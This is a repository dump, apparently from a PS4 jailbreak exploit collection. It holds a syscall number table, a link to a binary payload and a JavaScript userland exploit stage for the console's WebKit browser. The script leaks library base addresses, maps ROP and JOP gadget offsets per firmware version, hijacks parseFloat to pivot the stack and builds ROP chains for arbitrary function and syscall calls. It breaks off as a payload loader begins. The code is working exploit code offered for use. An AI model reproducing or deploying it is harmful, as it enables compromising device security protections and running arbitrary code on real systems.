218 |   "sys_osem_delete": 550,
219 |   "sys_osem_open": 551,
220 |   "sys_osem_close": 552,
221 |   "sys_osem_wait": 553,
222 |   "sys_osem_trywait": 554,
223 |   "sys_osem_post": 555,
224 |   "sys_osem_cancel": 556,
225 |   "sys_namedobj_create": 557,
226 |   "sys_namedobj_delete": 558,
227 |   "sys_set_vm_container": 559,
228 |   "sys_debug_init": 560,
229 |   "sys_suspend_process": 561,
230 |   "sys_resume_process": 562,
231 |   "sys_opmc_enable": 563,
232 |   "sys_opmc_disable": 564,
233 |   "sys_opmc_set_ctl": 565,
234 |   "sys_opmc_set_ctr": 566,
235 |   "sys_opmc_get_ctr": 567,
236 |   "sys_budget_create": 568,
237 |   "sys_budget_delete": 569,
238 |   "sys_budget_get": 570,
239 |   "sys_budget_set": 571,
240 |   "sys_virtual_query": 572,
241 |   "sys_mdbg_call": 573,
242 |   "sys_sblock_create": 574,
243 |   "sys_sblock_delete": 575,
244 |   "sys_sblock_enter": 576,
245 |   "sys_sblock_exit": 577,
246 |   "sys_sblock_xenter": 578,
247 |   "sys_sblock_xexit": 579,
248 |   "sys_eport_create": 580,
249 |   "sys_eport_delete": 581,
250 |   "sys_eport_trigger": 582,
251 |   "sys_eport_open": 583,
252 |   "sys_eport_close": 584,
253 |   "sys_is_in_sandbox": 585,
254 |   "sys_dmem_container": 586,
255 |   "sys_get_authinfo": 587,
256 |   "sys_mname": 588,
257 |   "sys_dynlib_dlopen": 589,
258 |   "sys_dynlib_dlclose": 590,
259 |   "sys_dynlib_dlsym": 591,
260 |   "sys_dynlib_get_list": 592,
261 |   "sys_dynlib_get_info": 593,
262 |   "sys_dynlib_load_prx": 594,
263 |   "sys_dynlib_unload_prx": 595,
264 |   "sys_dynlib_do_copy_relocations": 596,
265 |   "sys_dynlib_prepare_dlclose": 597,
266 |   "sys_dynlib_get_proc_param": 598,
267 |   "sys_dynlib_process_needed_and_relocate": 599,
268 |   "sys_sandbox_path": 600,
269 |   "sys_mdbg_service": 601,
270 |   "sys_randomized_path": 602,
271 |   "sys_rdup": 603,
272 |   "sys_dl_get_metadata": 604,
273 |   "sys_workaround8849": 605,
274 |   "sys_is_development_mode": 606,
275 |   "sys_get_self_auth_info": 607,
276 |   "sys_dynlib_get_info_ex": 608,
277 |   "sys_budget_getid": 609,
278 |   "sys_budget_get_ptype": 610,
279 |   "sys_get_paging_stats_of_all_threads": 611,
280 |   "sys_get_proc_type_info": 612,
281 |   "sys_get_resident_count": 613,
282 |   "sys_prepare_to_suspend_process": 614,
283 |   "sys_get_resident_fmem_count": 615,
284 |   "sys_thr_get_name": 616,
285 |   "sys_set_gpo": 617,
286 |   "sys_get_paging_stats_of_all_objects": 618,
287 |   "sys_test_debug_rwmem": 619,
288 |   "sys_free_stack": 620,
289 |   "sys_suspend_system": 621,
290 |   "sys_ipmimgr_call": 622,
291 |   "sys_get_gpo": 623,
292 |   "sys_get_vm_map_timestamp": 624,
293 |   "sys_opmc_set_hw": 625,
294 |   "sys_opmc_get_hw": 626,
295 |   "sys_get_cpu_usage_all": 627,
296 |   "sys_mmap_dmem": 628,
297 |   "sys_physhm_open": 629,
298 |   "sys_physhm_unlink": 630,
299 |   "sys_resume_internal_hdd": 631,
300 |   "sys_thr_suspend_ucontext": 632,
301 |   "sys_thr_resume_ucontext": 633,
302 |   "sys_thr_get_ucontext": 634,
303 |   "sys_thr_set_ucontext": 635,
304 |   "sys_set_timezone_info": 636,
305 |   "sys_set_phys_fmem_limit": 637,
306 |   "sys_utc_to_localtime": 638,
307 |   "sys_localtime_to_utc": 639,
308 |   "sys_set_uevt": 640,
309 |   "sys_get_cpu_usage_proc": 641,
310 |   "sys_get_map_statistics": 642,
311 |   "sys_set_chicken_switches": 643,
312 |   "sys_extend_page_table_pool": 644,
313 |   "sys_645": 645,
314 |   "sys_get_kernel_mem_statistics": 646,
315 |   "sys_get_sdk_compiled_version": 647,
316 |   "sys_app_state_change": 648,
317 |   "sys_dynlib_get_obj_member": 649,
318 |   "sys_budget_get_ptype_of_budget": 650,
319 |   "sys_prepare_to_resume_process": 651,
320 |   "sys_process_terminate": 652,
321 |   "sys_blockpool_open": 653,
322 |   "sys_blockpool_map": 654,
323 |   "sys_blockpool_unmap": 655,
324 |   "sys_dynlib_get_info_for_libdbg": 656,
325 |   "sys_blockpool_batch": 657,
326 |   "sys_fdatasync": 658,
327 |   "sys_dynlib_get_list2": 659,
328 |   "sys_dynlib_get_info2": 660,
329 |   "sys_aio_submit": 661,
330 |   "sys_aio_multi_delete": 662,
331 |   "sys_aio_multi_wait": 663,
332 |   "sys_aio_multi_poll": 664,
333 |   "sys_aio_get_data": 665,
334 |   "sys_aio_multi_cancel": 666,
335 |   "sys_get_bio_usage_all": 667,
336 |   "sys_aio_create": 668,
337 |   "sys_aio_submit_cmd": 669,
338 |   "sys_aio_init": 670,
339 |   "sys_get_page_table_stats": 671,
340 |   "sys_dynlib_get_list_for_libdbg": 672
341 | }
342 | 


--------------------------------------------------------------------------------
/QuickHEN/unblocker.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamFAPS/PS4-Exploits/eaee94c568130de1b866c4b55811acf7219974f5/QuickHEN/unblocker.bin


--------------------------------------------------------------------------------
/QuickHEN/userland.js:
--------------------------------------------------------------------------------
  1 | var p;
  2 | 
  3 | function sleep(milliseconds) { // busy-wait; the 1e7 iteration cap keeps it from spinning forever
  4 | 	var start = new Date().getTime();
  5 | 	for (var i = 0; i < 1e7; i++) {
  6 | 		if ((new Date().getTime() - start) > milliseconds)
  7 | 			break;
  8 | 	}
  9 | }
 10 | 
 11 | var printText = function (x) { // plain-text output (innerText)
 12 | 	document.getElementById("console").innerText += x + "\n";
 13 | }
 14 | var print = function (string) { // like printText but the string is interpreted as HTML
 15 | 	document.getElementById("console").innerHTML += string + "\n";
 16 | }
 17 | 
 18 | var get_jmptgt = function (addr) {
 19 | 	var z = p.read4(addr) & 0xFFFF;
 20 | 	var y = p.read4(addr.add32(2));
 21 | 	if (z != 0x25ff) return 0;
 22 | 
 23 | 	return addr.add32(y + 6);
 24 | }
 25 | 
 26 | var gadgetmap_wk = {
 27 | 	"ep": [0x5b, 0x41, 0x5c, 0x41, 0x5d, 0x41, 0x5e, 0x41, 0x5f, 0x5d, 0xc3],
 28 | 	"pop rsi": [0x5e, 0xc3],
 29 | 	"pop rdi": [0x5f, 0xc3],
 30 | 	"pop rsp": [0x5c, 0xc3],
 31 | 	"pop rax": [0x58, 0xc3],
 32 | 	"pop rdx": [0x5a, 0xc3],
 33 | 	"pop rcx": [0x59, 0xc3],
 35 | 	"pop rbp": [0x5d, 0xc3],
 36 | 	"pop r8": [0x47, 0x58, 0xc3],
 37 | 	"pop r9": [0x47, 0x59, 0xc3],
 38 | 	"infloop": [0xeb, 0xfe, 0xc3],
 39 | 	"ret": [0xc3],
 40 | 	"mov [rdi], rsi": [0x48, 0x89, 0x37, 0xc3],
 41 | 	"mov [rax], rsi": [0x48, 0x89, 0x30, 0xc3],
 42 | 	"mov [rdi], rax": [0x48, 0x89, 0x07, 0xc3],
 43 | 	"mov rax, rdi": [0x48, 0x89, 0xf8, 0xc3]
 44 | };
 45 | 
 46 | var slowpath_jop = [0x48, 0x8B, 0x7F, 0x48, 0x48, 0x8B, 0x07, 0x48, 0x8B, 0x40, 0x30, 0xFF, 0xE0];
 47 | slowpath_jop.reverse();
 48 | 
 49 | var gadgets, gadgetoffs = {}; // gadgetoffs: image offsets recorded by the slow byte-scan path in findgadget
 50 | 
 51 | window.stage2 = function () {
 52 | 	try {
 53 | 		window.stage2_();
 54 | 	} catch (e) {
 55 | 		print(e);
 56 | 	}
 57 | }
 58 | 
 59 | /* Get user agent for determining system firmware: "Mozilla/5.0 (PlayStation 4 5.05) AppleWebKit/..." -> "5.05" */
 60 | var fwFromUA = navigator.userAgent.substring(navigator.userAgent.indexOf("5.0 (") + 19, navigator.userAgent.indexOf(") Apple"));
 61 | if (fwFromUA == "5.07") alert(fwFromUA + " is not supported yet");
 62 | var gadgetcache, gadgetshiftcache; // declared up front so an unrecognised firmware leaves them undefined instead of throwing a ReferenceError below
 63 | if (fwFromUA == "5.01") {
 64 | 	gadgetcache = {
 65 | 		"ret":                    0x0000003C, // 4.55-5.05
 66 | 		"jmp rax":                0x00000082, // 4.55-5.05
 67 | 		"ep":                     0x000000AD, // 4.55-5.05
 68 | 		"pop rbp":                0x000000B6, // 4.55-5.05
 69 | 		"mov [rdi], rax":         0x0014536B, // 5.01
 70 | 		"pop r8":                 0x000179C5, // 5.01-5.05
 71 | 		"pop rax":                0x000043F5, // 5.01-5.05
 72 | 		"mov rax, rdi":           0x000058D0, // 5.01-5.05
 73 | 		"mov rax, [rax]":         0x0006C83A, // 5.01-5.05
 74 | 		"pop rsi":                0x0008F38A, // 5.01-5.05
 75 | 		"pop rdi":                0x00038DBA, // 5.01-5.05
 76 | 		"pop rcx":                0x00052E59, // 5.01-5.05
 77 | 		"pop rsp":                0x0001E687, // 5.01-5.05
 78 | 		"mov [rdi], rsi":         0x00023AC2, // 5.01-5.05
 79 | 		"mov [rax], rsi":         0x002565A7, // 5.01
 80 | 		"pop rdx":                0x000DEDC2, // 5.01
 81 | 		"pop r9":                 0x00BB30CF, // 5.01
 82 | 		"jop":                    0x000C37D0, // 5.01-5.05
 83 | 		"infloop":                0x0151EFCA, // 5.01
 84 | 
 85 | 		"add rax, rcx":           0x000156DB, // 5.01-5.05
 86 | 		"mov rdx, rax":           0x00353A71, // 5.01
 87 | 		"mov rdi, rax":           0x015A3FAF, // 5.01
 88 | 		"mov rax, rdx":           0x001CEE60, // 5.01
 89 | 
 90 | 		// 5.01 JOP Gadgets
 91 | 		"jop1":                   0x012A184D, // 5.01
 92 | 		"jop2":                   0x006EF2E5, // 5.01
 93 | 		"jop3":                   0x015CA29B, // 5.01
 94 | 		"jop4":                   0x012846B4, // 5.01
 95 | 		"jop_mov rbp, rsp":       0x000F094A, // 5.01-5.05
 96 | 		"jop6":                   0x002728A1, // 5.01
 97 | 		
 98 | 		// kROP Chain stuff
 99 | 		"ret2userland":           0x0005CDB9, // 5.01-5.05
100 | 		
101 | 		// Used for kernel exploit stuff
102 | 		"mov rax, [rdi]":         0x00046EF9, // 5.01-5.05
103 | 		"add rdi, rax":           0x0055566F, // 5.01
104 | 		"add rax, rsi":           0x001520C6, // 5.01-5.05
105 | 		"and rax, rsi":           0x01570A1F, // 5.01
106 | 		"jmp rdi":                0x00295DBE, // 5.01
107 | 		
108 | 		"longjmp":                0x000014E8, // 5.01-5.05
109 | 		"createThread":           0x00779190, // 5.01
110 | 	};
111 | 	gadgetshiftcache = {
112 | 		"stackshift_jop1":        0x00000058, // 5.01-5.05
113 | 		"stackshift_jop6":        0x00000028, // 4.55-5.05
114 | 	};
115 | } else if (fwFromUA == "5.05") {
116 | 	gadgetcache = {
117 | 		"ret":                    0x0000003C, // 4.55-5.05
118 | 		"jmp rax":                0x00000082, // 4.55-5.05
119 | 		"ep":                     0x000000AD, // 4.55-5.05
120 | 		"pop rbp":                0x000000B6, // 4.55-5.05
121 | 		"mov [rdi], rax":         0x003ADAEB, // 5.05
122 | 		"pop r8":                 0x000179C5, // 5.01-5.05
123 | 		"pop rax":                0x000043F5, // 5.01-5.05
124 | 		"mov rax, rdi":           0x000058D0, // 5.01-5.05
125 | 		"mov rax, [rax]":         0x0006C83A, // 5.01-5.05
126 | 		"pop rsi":                0x0008F38A, // 5.01-5.05
127 | 		"pop rdi":                0x00038DBA, // 5.01-5.05
128 | 		"pop rcx":                0x00052E59, // 5.01-5.05
129 | 		"pop rsp":                0x0001E687, // 5.01-5.05
130 | 		"mov [rdi], rsi":         0x00023AC2, // 5.01-5.05
131 | 		"mov [rax], rsi":         0x00256667, // 5.05
132 | 		"pop rdx":                0x001BE024, // 5.05
133 | 		"pop r9":                 0x00BB320F, // 5.05
134 | 		"jop":                    0x000C37D0, // 5.01-5.05
135 | 		"infloop":                0x01545EAA, // 5.05
136 | 
137 | 		"add rax, rcx":           0x000156DB, // 5.01-5.05
138 | 		"mov rdx, rax":           0x00353B31, // 5.05
139 | 		"mov rdi, rax":           0x015A412F, // 5.05
140 | 		"mov rax, rdx":           0x001CEF20, // 5.05
141 | 
142 | 		// kROP Chain Stuff
143 | 		"ret2userland":           0x0005CDB9, // 5.01-5.05
144 | 		
145 | 		// 5.05 JOP Gadgets
146 | 		"jop1":                   0x012A19CD, // 5.05
147 | 		"jop2":                   0x006EF4E5, // 5.05
148 | 		"jop3":                   0x015CA41B, // 5.05
149 | 		"jop4":                   0x01284834, // 5.05
150 | 		"jop_mov rbp, rsp":       0x000F094A, // 5.01-5.05
151 | 		"jop6":                   0x00272961, // 5.05
152 | 		
153 | 		// Used for kernel exploit stuff
154 | 		"mov rax, [rdi]":         0x00046EF9, // 5.01-5.05
155 | 		"add rdi, rax":           0x005557DF, // 5.05
156 | 		"add rax, rsi":           0x001520C6, // 5.01-5.05
157 | 		"and rax, rsi":           0x01570B9F, // 5.05
158 | 		"jmp rdi":                0x00295E7E, // 5.05
159 | 		
160 | 		"mov [rsi], rdx":         0x00A6450A, // 5.05
161 | 		
162 | 		"longjmp":                0x000014E8, // 5.01-5.05
163 | 		"createThread":           0x00779390, // 5.05
164 | 	};
165 | 	gadgetshiftcache = {
166 | 		"stackshift_jop1":        0x00000058, // 5.01-5.05
167 | 		"stackshift_jop6":        0x00000028, // 4.55-5.05
168 | 	};
169 | } else if (fwFromUA == "4.55" || fwFromUA == "4.74") {
170 | 	gadgetcache = {
171 | 		// Regular ROP Gadgets
172 | 		"ret":                    0x0000003C, // 4.55-5.05
173 | 		"jmp rax":                0x00000082, // 4.55-5.05
174 | 		"ep":                     0x000000AD, // 4.55-5.05
175 | 		"pop rbp":                0x000000B6, // 4.55-5.05
176 | 		"mov [rdi], rax":         0x00003FBA, // 4.55-4.74
177 | 		"pop r8":                 0x0000CC42, // 4.55-4.74
178 | 		"pop rax":                0x0000CC43, // 4.55-4.74
179 | 		"mov rax, rdi":           0x0000E84E, // 4.55-4.74
180 | 		"mov rax, [rax]":         0x000130A3, // 4.55-4.74
181 | 		"pop rsi":                0x0007B1EE, // 4.55-4.74
182 | 		"pop rdi":                0x0007B23D, // 4.55-4.74
183 | 		"pop rcx":                0x00271DE3, // 4.55-4.74
184 | 		"pop rsp":                0x0027A450, // 4.55-4.74
185 | 		"mov [rdi], rsi":         0x0039CF70, // 4.55-4.74
186 | 		"mov [rax], rsi":         0x003D0877, // 4.55-4.74
187 | 		"pop rdx":                0x00565838, // 4.55-4.74
188 | 		"pop r9":                 0x0078BA1F, // 4.55-4.74
189 | 		"jop":                    0x01277350, // 4.55-4.74
190 | 		"infloop":                0x012C4009, // 4.55-4.74
191 | 
192 | 		"add rax, rcx":           0x0084D04D, // 4.55-4.74
193 | 		"mov rdx, rax":           0x00012A16, // 4.55-4.74
194 | 		//"mov rdi, rax":           0xDEADBEEF, // 4.55-4.74
195 | 		"mov rax, rdx":           0x001E4EDE, // 4.55-4.74
196 | 
197 | 		// Used for kernel exploit stuff
198 | 		"mov rax, [rdi]":         0x0013A220, // 4.55-4.74
199 | 		"add rdi, rax":           0x0141D1CD, // 4.55-4.74
200 | 		"add rax, rsi":           0x00C71EC4, // 4.55-4.74
201 | 		//"and rax, rsi":           0xDEADBEEF, // 4.55-4.74
202 | 		"jmp rdi":                0x00182715, // 4.55-4.74
203 | 
204 | 		// kROP Chain Stuff
205 | 		"ret2userland":           0x0008905C, // 4.55-4.74
206 | 		"add [r9], rbp":          0x01320CB1, // 4.55-4.74
207 | 		"mov rsp, rdx":           0x00F3DED0, // 4.55-4.74
208 | 		"test":                   0x000028A2, // 4.55-4.74
209 | 		"sub rax, rcx":           0x00E9478B, // 4.55-4.74
210 | 		
211 | 		// special 4.55-4.74
212 | 		"add rsi, [rdi]; mov rax, rsi":   0x0119D1F0, // 4.55-4.74
213 | 		"jmp rdx_more":           0x001517C7, // 4.55-4.74
214 | 		
215 | 		// JOP Gadgets
216 | 		"jop1":                   0x005D365D, // 4.55-4.74
217 | 		"jop2":                   0x007B0E65, // 4.55-4.74
218 | 		"jop3":                   0x0142BDBB, // 4.55-4.74
219 | 		"jop4":                   0x00637AC4, // 4.55-4.74
220 | 		"jop_mov rbp, rsp":       0x001B5B7A, // 4.55-4.74
221 | 		"jop6":                   0x000F391D, // 4.55-4.74
222 | 
223 | 		// New kROP Gadgets
224 | 		"mov [rsi], rdx":         0x01574006, // 4.55-4.74
225 | 
226 | 		// Functions
227 | 		"longjmp":                0x00001458, // 4.55-4.74
228 | 		"createThread":           0x0116ED40, // 4.55-4.74
229 | 	};
230 | 	gadgetshiftcache = {
231 | 		"stackshift_jop1":        0x00000048, // 4.55-4.74
232 | 		"stackshift_jop6":        0x00000028, // 4.55-5.05
233 | 	};
234 | }
235 | 
236 | window.gadgets_shift = gadgetshiftcache;
237 | 
238 | window.stage2_ = function () {
239 | 	p = window.prim;
240 | 
241 | 	p.leakfunc = function (func) {
242 | 		var fptr_store = p.leakval(func);
243 | 		return (p.read8(fptr_store.add32(0x18))).add32(0x40);
244 | 	}
245 | 
246 | 	var parseFloatStore = p.leakfunc(parseFloat);
247 | 	var parseFloatPtr = p.read8(parseFloatStore);
248 | 	//alert(parseFloatPtr);
249 | 	
250 | 	// Resolve libSceWebKit2 base using parseFloat offset
251 | 	var webKitBase = parseFloatPtr;
252 | 	if (fwFromUA == "5.00" || fwFromUA == "5.01" || fwFromUA == "5.03" || fwFromUA == "5.05" || fwFromUA == "5.07") {
253 | 		webKitBase.sub32inplace(0x578540);
254 | 	} else if (fwFromUA == "4.55" || fwFromUA == "4.74") {
255 | 		webKitBase.sub32inplace(0xE8DDA0);
256 | 	} else alert("unknown parseFloat offset. parseFloatPtr: " + parseFloatPtr);
257 | 	window.webKitBase = webKitBase;
258 | 	
259 | 	var o2wk = function (o) {
260 | 		return webKitBase.add32(o);
261 | 	}
262 | 	window.o2wk = o2wk;
263 | 
264 | 	if (fwFromUA == "4.55" || fwFromUA == "4.74") {
265 | 		gadgets = {
266 | 			"__stack_chk_fail": o2wk(0xC8),
267 | 			"__stack_chk_fail_offset": 0xD190,
268 | 			"memcmp": o2wk(0x228),
269 | 			"memcmp_offset": 0x71C60,
270 | 			"memset": o2wk(0x248),
271 | 			"memset_offset": 0x2AE10,
272 | 			"setjmp": o2wk(0x1468)
273 | 		};
274 | 	} else if (fwFromUA == "5.00" || fwFromUA == "5.01" || fwFromUA == "5.03" || fwFromUA == "5.05" || fwFromUA == "5.07") {
275 | 		gadgets = {
276 | 			"__stack_chk_fail": o2wk(0xC8),
277 | 			"__stack_chk_fail_offset": 0x11EC0,
278 | 			"memcmp": o2wk(0x208),
279 | 			"memcmp_offset": 0x8AFA0,
280 | 			"memset": o2wk(0x228),
281 | 			"memset_offset": 0x118,
282 | 			"setjmp": o2wk(0x14F8)
283 | 		};
284 | 	}
285 | 
286 | 	var libSceLibcInternalBase = p.read8(get_jmptgt(gadgets.memset));
287 | 	libSceLibcInternalBase.sub32inplace(gadgets.memset_offset);
288 | 	window.libSceLibcInternalBase = libSceLibcInternalBase;
289 | 	//alert(libSceLibcInternalBase);
290 | 	var o2lc = function (o) {
291 | 		return libSceLibcInternalBase.add32(o);
292 | 	}
293 | 	window.o2lc = o2lc;
294 | 	
295 | 	var libKernelBase = p.read8(get_jmptgt(gadgets.__stack_chk_fail));
296 | 	libKernelBase.sub32inplace(gadgets.__stack_chk_fail_offset);
297 | 	window.libKernelBase = libKernelBase;
298 | 	//alert(window.libKernelBase);
299 | 	var o2lk = function (o) {
300 | 		return libKernelBase.add32(o);
301 | 	}
302 | 	window.o2lk = o2lk;
303 | 	
304 | 	var wkview = new Uint8Array(0x1000);
305 | 	var wkstr = p.leakval(wkview).add32(0x10);
306 | 	var orig_wkview_buf = p.read8(wkstr);
307 | 
308 | 	p.write8(wkstr, webKitBase);
309 | 	//p.write4(wkstr.add32(8), 0x367c000);
310 | 	p.write4(wkstr.add32(8), 0x3052D38);
311 | 
312 | 	var gadgets_to_find = 0;
313 | 	var gadgetnames = [];
314 | 	for (var gadgetname in gadgetmap_wk) {
315 | 		if (gadgetmap_wk.hasOwnProperty(gadgetname)) {
316 | 			gadgets_to_find++;
317 | 			gadgetnames.push(gadgetname);
318 | 			gadgetmap_wk[gadgetname].reverse();
319 | 		}
320 | 	}
321 | 
322 | 	gadgets_to_find++;
323 | 
324 | 	var findgadget = function (donecb) {
325 | 		if (gadgetcache) {
326 | 			gadgets_to_find = 0;
327 | 			slowpath_jop = 0;
328 | 
329 | 			for (var gadgetname in gadgetcache) {
330 | 				if (gadgetcache.hasOwnProperty(gadgetname))
331 | 					gadgets[gadgetname] = o2wk(gadgetcache[gadgetname]);
332 | 			}
333 | 		} else {
334 | 			for (var i = 0; i < wkview.length; i++) {
335 | 				if (wkview[i] == 0xc3) {
336 | 					for (var nl = 0; nl < gadgetnames.length; nl++) {
337 | 						var found = 1;
338 | 						if (!gadgetnames[nl])
339 | 							continue;
340 | 						var gadgetbytes = gadgetmap_wk[gadgetnames[nl]];
341 | 						for (var compareidx = 0; compareidx < gadgetbytes.length; compareidx++) {
342 | 							if (gadgetbytes[compareidx] != wkview[i - compareidx]) {
343 | 								found = 0;
344 | 								break;
345 | 							}
346 | 						}
347 | 						if (!found)
348 | 							continue;
349 | 						gadgets[gadgetnames[nl]] = o2wk(i - gadgetbytes.length + 1);
350 | 						gadgetoffs[gadgetnames[nl]] = i - gadgetbytes.length + 1;
351 | 						delete gadgetnames[nl];
352 | 						gadgets_to_find--;
353 | 					}
354 | 				} else if (wkview[i] == 0xe0 && wkview[i - 1] == 0xff && slowpath_jop) {
355 | 					var found = 1;
356 | 					for (var compareidx = 0; compareidx < slowpath_jop.length; compareidx++) {
357 | 						if (slowpath_jop[compareidx] != wkview[i - compareidx]) {
358 | 							found = 0;
359 | 							break;
360 | 						}
361 | 					}
362 | 					if (!found)
363 | 						continue;
364 | 					gadgets["jop"] = o2wk(i - slowpath_jop.length + 1);
365 | 					gadgetoffs["jop"] = i - slowpath_jop.length + 1;
366 | 					gadgets_to_find--;
367 | 					slowpath_jop = 0;
368 | 				}
369 | 
370 | 				if (!gadgets_to_find)
371 | 					break;
372 | 			}
373 | 		}
374 | 		if (!gadgets_to_find && !slowpath_jop)
375 | 			setTimeout(donecb, 50);
376 | 		else {
377 | 			print("missing gadgets: ");
378 | 			for (var nl in gadgetnames)
379 | 				print(" - " + gadgetnames[nl]);
380 | 			if (slowpath_jop)
381 | 				print(" - jop gadget");
382 | 		}
383 | 	}
384 | 
385 | 	findgadget(function () { });
386 | 	var hold1;
387 | 	var hold2;
388 | 	var holdz;
389 | 	var holdz1;
390 | 
391 | 	while (1) {
392 | 		hold1 = { a: 0, b: 0, c: 0, d: 0 };
393 | 		hold2 = { a: 0, b: 0, c: 0, d: 0 };
394 | 		holdz1 = p.leakval(hold2);
395 | 		holdz = p.leakval(hold1);
396 | 		if (holdz.low - 0x30 == holdz1.low) break;
397 | 	}
398 | 
399 | 	var pushframe = [];
400 | 	pushframe.length = 0x80;
401 | 	var funcbuf;
402 | 	var funcbuf32 = new Uint32Array(0x100);
403 | 	nogc.push(funcbuf32);
404 | 
405 | 	var launch_chain = function (chain) {
406 | 		var stackPointer = 0;
407 | 		var stackCookie = 0;
408 | 		var orig_reenter_rip = 0;
409 | 
410 | 		var reenter_help = {
411 | 			length: {
412 | 				valueOf: function () {
413 | 					orig_reenter_rip = p.read8(stackPointer);
414 | 					stackCookie = p.read8(stackPointer.add32(8));
415 | 					var returnToFrame = stackPointer;
416 | 
417 | 					var ocnt = chain.count;
418 | 					chain.push_write8(stackPointer, orig_reenter_rip);
419 | 					chain.push_write8(stackPointer.add32(8), stackCookie);
420 | 
421 | 					if (chain.runtime) returnToFrame = chain.runtime(stackPointer);
422 | 
423 | 					chain.push(gadgets["pop rsp"]);
424 | 					chain.push(returnToFrame); // -> back to the trap life
425 | 					chain.count = ocnt;
426 | 
427 | 					p.write8(stackPointer, (gadgets["pop rsp"])); // pop pop
428 | 					p.write8(stackPointer.add32(8), chain.stackBase); // rop rop
429 | 				}
430 | 			}
431 | 		};
432 | 		
433 | 		funcbuf = p.read8(p.leakval(funcbuf32).add32(0x10));
434 | 
435 | 		p.write8(funcbuf.add32(0x30), gadgets["setjmp"]);
436 | 		p.write8(funcbuf.add32(0x80), gadgets["jop"]);
437 | 		p.write8(funcbuf, funcbuf);
438 | 		p.write8(parseFloatStore, gadgets["jop"]);
439 | 		var orig_hold = p.read8(holdz1);
440 | 		var orig_hold48 = p.read8(holdz1.add32(0x48));
441 | 
442 | 		p.write8(holdz1, funcbuf.add32(0x50));
443 | 		p.write8(holdz1.add32(0x48), funcbuf);
444 | 		parseFloat(hold2, hold2, hold2, hold2, hold2, hold2);
445 | 		p.write8(holdz1, orig_hold);
446 | 		p.write8(holdz1.add32(0x48), orig_hold48);
447 | 
448 | 		stackPointer = p.read8(funcbuf.add32(0x10));
449 | 		var rtv = Array.prototype.splice.apply(reenter_help); // length.valueOf() above runs the chain
450 | 		return p.leakval(rtv);
451 | 	}
452 | 
453 | 	window.gadgets = gadgets; // rop.js and the helpers below look gadgets up through window.gadgets
454 | 	p.loadchain = launch_chain;
455 | 
456 | 	function swapkeyval(json) {
457 | 		var ret = {};
458 | 		for (var key in json) {
459 | 			if (json.hasOwnProperty(key))
460 | 				ret[json[key]] = key;
461 | 		}
462 | 		return ret;
463 | 	}
464 | 
465 | 	var kview = new Uint8Array(0x1000);
466 | 	var kstr = p.leakval(kview).add32(0x10);
467 | 	var orig_kview_buf = p.read8(kstr);
468 | 
469 | 	p.write8(kstr, window.libKernelBase);
470 | 	p.write4(kstr.add32(8), 0x40000);
471 | 
472 | 	var countbytes; // offset of the first "rdloc" string in libkernel: upper bound for the syscall-stub scan below
473 | 	for (var i = 0; i < 0x40000; i++) {
474 | 		if (kview[i] == 0x72 && kview[i + 1] == 0x64 && kview[i + 2] == 0x6c && kview[i + 3] == 0x6f && kview[i + 4] == 0x63) {
475 | 			countbytes = i;
476 | 			break;
477 | 		}
478 | 	}
479 | 	if (countbytes === undefined) throw new Error("libkernel scan bound (\"rdloc\") not found");
480 | 	p.write4(kstr.add32(8), countbytes + 32);
481 | 	var dview32 = new Uint32Array(1);
482 | 	var dview8 = new Uint8Array(dview32.buffer);
483 | 	for (var i = 0; i < countbytes; i++) {
484 | 		if (kview[i] == 0x48 && kview[i + 1] == 0xc7 && kview[i + 2] == 0xc0 && kview[i + 7] == 0x49 && kview[i + 8] == 0x89 && kview[i + 9] == 0xca && kview[i + 10] == 0x0f && kview[i + 11] == 0x05) {
485 | 			dview8[0] = kview[i + 3];
486 | 			dview8[1] = kview[i + 4];
487 | 			dview8[2] = kview[i + 5];
488 | 			dview8[3] = kview[i + 6];
489 | 			var syscallno = dview32[0];
490 | 			window.syscalls[syscallno] = window.libKernelBase.add32(i);
491 | 		}
492 | 	}
493 | 
494 | 	var chain = new window.rop;
495 | 	var returnvalue;
496 | 
497 | 	p.fcall_ = function (rip, rdi, rsi, rdx, rcx, r8, r9) {
498 | 		chain.clear();
499 | 
500 | 		chain.notimes = this.next_notime;
501 | 		this.next_notime = 1;
502 | 
503 | 		chain.fcall(rip, rdi, rsi, rdx, rcx, r8, r9);
504 | 
505 | 		chain.push(window.gadgets["pop rdi"]);
506 | 		chain.push(chain.stackBase.add32(0x3ff8));
507 | 		chain.push(window.gadgets["mov [rdi], rax"]);
508 | 
509 | 		chain.push(window.gadgets["pop rax"]);
510 | 		chain.push(p.leakval(0x41414242));
511 | 
512 | 		if (chain.run().low != 0x41414242)
513 | 			throw new Error("unexpected rop behaviour");
514 | 		returnvalue = p.read8(chain.stackBase.add32(0x3ff8));
515 | 	}
516 | 
517 | 	p.fcall = function () {
518 | 		var rv = p.fcall_.apply(this, arguments);
519 | 		return returnvalue;
520 | 	}
521 | 
522 | 	p.readstr = function (addr) {
523 | 		var addr_ = addr.add32(0);
524 | 		var rd = p.read4(addr_);
525 | 		var buf = "";
526 | 		while (rd & 0xFF) {
527 | 			buf += String.fromCharCode(rd & 0xFF);
528 | 			addr_.add32inplace(1);
529 | 			rd = p.read4(addr_);
530 | 		}
531 | 		return buf;
532 | 	}
533 | 
534 | 	p.syscall = function (sysc, rdi, rsi, rdx, rcx, r8, r9) {
535 | 		if (typeof sysc == "string")
536 | 			sysc = window.syscallnames[sysc];
537 | 			
538 | 		if (typeof sysc != "number")
539 | 			throw new Error("invalid syscall");
540 | 
541 | 		var off = window.syscalls[sysc];
542 | 		if (off == undefined)
543 | 			throw new Error("invalid syscall");
544 | 
545 | 		return p.fcall(off, rdi, rsi, rdx, rcx, r8, r9);
546 | 	}
547 | 
548 | 	p.stringify = function (str) {
549 | 		var bufView = new Uint8Array(str.length + 1);
550 | 		for (var i = 0; i < str.length; i++)
551 | 			bufView[i] = str.charCodeAt(i) & 0xFF;
552 | 		window.nogc.push(bufView);
553 | 		return p.read8(p.leakval(bufView).add32(0x10));
554 | 	};
555 | 
556 | 	p.malloc = function malloc(sz) {
557 | 		var backing = new Uint8Array(0x10000 + sz);
558 | 		window.nogc.push(backing);
559 | 		var ptr = p.read8(p.leakval(backing).add32(0x10));
560 | 		ptr.backing = backing;
561 | 		return ptr;
562 | 	}
563 | 
564 | 	p.malloc32 = function malloc32(sz) {
565 | 		var backing = new Uint8Array(0x10000 + sz * 4);
566 | 		window.nogc.push(backing);
567 | 		var ptr = p.read8(p.leakval(backing).add32(0x10));
568 | 		ptr.backing = new Uint32Array(backing.buffer);
569 | 		return ptr;
570 | 	}
571 | 
572 | 	function runPayload(path) {
